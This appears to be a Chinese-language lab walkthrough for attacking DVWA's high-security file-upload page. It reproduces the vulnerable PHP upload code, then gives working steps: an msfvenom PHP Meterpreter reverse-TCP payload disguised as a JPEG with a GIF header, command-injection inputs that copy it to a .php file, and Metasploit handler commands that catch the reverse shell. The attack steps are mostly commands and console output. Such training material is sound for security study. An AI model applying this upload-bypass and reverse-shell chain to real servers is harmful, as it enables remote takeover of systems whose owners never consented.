<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// File information
$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
$uploaded_ext = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
$uploaded_tmp = $_FILES[ 'uploaded' ][ 'tmp_name' ];
// Is it an image?
if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
( $uploaded_size < 100000 ) &&
getimagesize( $uploaded_tmp ) ) {
// Can we move the file to the upload folder?
if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
// No
echo '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
echo "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
else {
// Invalid file
echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
}
}
msfvenom
生成shellcode
# lhost 为监听机ip(一般为本机)lport 为监听端口
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.ip.ip lport=3333 -f raw >> shell3.jpeg
getimagesize
函数的检查,vi打开shell.jpeg,头部添加一行GIF98
Command Injection
, 我们需要使用命令注入来将文件后缀由jpeg改为php,这样后面访问时,服务器会执行该文件在框中输入:
#查看
127.0.0.1|ls /app/hackable/uploads/shell3.jpeg
# 复制
127.0.0.1|cp /app/hackable/uploads/shell3.jpeg /app/hackable/uploads/shell3.php
msfconsole
sf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.ip.ip
lhost => 192.168.ip.ip
msf6 exploit(multi/handler) > set lport 3333
lport => 3333
msf6 exploit(multi/handler) > run
http://192.168.靶机.ip/hackable/uploads/shell3.php
参考: https://www.hackingarticles.in/hack-file-upload-vulnerability-dvwa-bypass-security/
手机扫一扫
移动阅读更方便
你可能感兴趣的文章